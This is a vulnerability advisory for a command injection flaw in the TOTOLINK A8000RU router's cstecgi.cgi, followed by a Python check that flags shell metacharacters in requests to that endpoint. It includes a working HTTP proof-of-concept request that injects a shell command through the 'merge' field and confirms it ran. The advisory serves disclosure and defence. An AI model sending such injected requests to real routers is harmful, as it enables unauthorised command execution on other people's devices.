# A8000RU Command Injection Vulnerability Summary

## Vulnerability Overview

A command injection vulnerability was discovered in the `cstecgi.cgi` of the TOTOLINK A8000RU router. An attacker can execute arbitrary operating system commands on the router by crafting malicious requests. The vulnerability is located in the `sub_421D08` function, which reads the user-provided parameter `merge` and passes its value to the `Uci_Set_Str` function. However, the value of `merge` is inserted into `v11`, processed with `snprintf`, and ultimately executed by the `CsteSystem` function via `execv`.

## Impact Scope

- **Vendor**: TOTOLINK
- **Product**: A8000RU
- **Version**: 7.1cu.643.b20200521
- **Vulnerability Type**: Command Injection

## Remediation

No specific remediation has been provided on the page. It is recommended to contact the vendor TOTOLINK for security updates or patches.

## Proof of Concept (PoC)

```http
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.6.2
Content-Length: 75
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Origin: http://192.168.6.2
Referer: http://192.168.6.2/basic/index.html
Accept-Encoding: gzip, deflate, br
Cookie: SESSION_ID=1772465702.2
Connection: keep-alive

{"topicurl":"setWiFiEasyGuestCfg","merge":" ls>./setWiFiEasyGuestCfg.txt "}
```

## Result

After submitting the HTTP request, it was observed that the `txt` file was successfully created, containing the list of filenames in the directory. This confirms that the command `ls>./setWiFiEasyGuestCfg.txt` was successfully executed.
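
## Detection Example

A detection check for the request pattern shown in the PoC, added here as an example and not part of the original advisory or of any vendor code. It flags JSON string fields in POSTs to `/cgi-bin/cstecgi.cgi` that contain shell metacharacters; the metacharacter set, the function names and the benign sample (a plain `merge` value of `"1"`) are assumptions made for this illustration.

```python
import json
import re

# Assumed set of characters a shell treats as operators, substitution or redirection.
SHELL_META = re.compile(r"[;&|`$<>\r\n]")
CGI_PATH = "/cgi-bin/cstecgi.cgi"  # endpoint named in the advisory

# Constructed sample requests: the first carries the body from the PoC above,
# the second is an assumed benign request for comparison.
SAMPLE_POC = (
    "POST /cgi-bin/cstecgi.cgi HTTP/1.1\r\nHost: 192.168.6.2\r\n\r\n"
    '{"topicurl":"setWiFiEasyGuestCfg","merge":" ls>./setWiFiEasyGuestCfg.txt "}'
)
SAMPLE_BENIGN = (
    "POST /cgi-bin/cstecgi.cgi HTTP/1.1\r\nHost: 192.168.6.2\r\n\r\n"
    '{"topicurl":"setWiFiEasyGuestCfg","merge":"1"}'
)


def parse_request(raw):
    """Split a raw HTTP request into (method, path, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2:
        return None, None, ""
    return request_line[0], request_line[1], body


def suspicious_fields(raw):
    """Return [(field, value)] for top-level JSON strings with shell metacharacters."""
    method, path, body = parse_request(raw)
    if method != "POST" or path is None or path.split("?", 1)[0] != CGI_PATH:
        return []
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        return []  # non-JSON bodies are out of scope for this check
    if not isinstance(doc, dict):
        return []
    return [(k, v) for k, v in doc.items()
            if isinstance(v, str) and SHELL_META.search(v)]


if __name__ == "__main__":
    for name, req in (("poc", SAMPLE_POC), ("benign", SAMPLE_BENIGN)):
        print(name, suspicious_fields(req))
```

The check inspects only top-level fields, so nested JSON values would need a recursive walk, and legitimate settings that contain these characters will need tuning against real traffic.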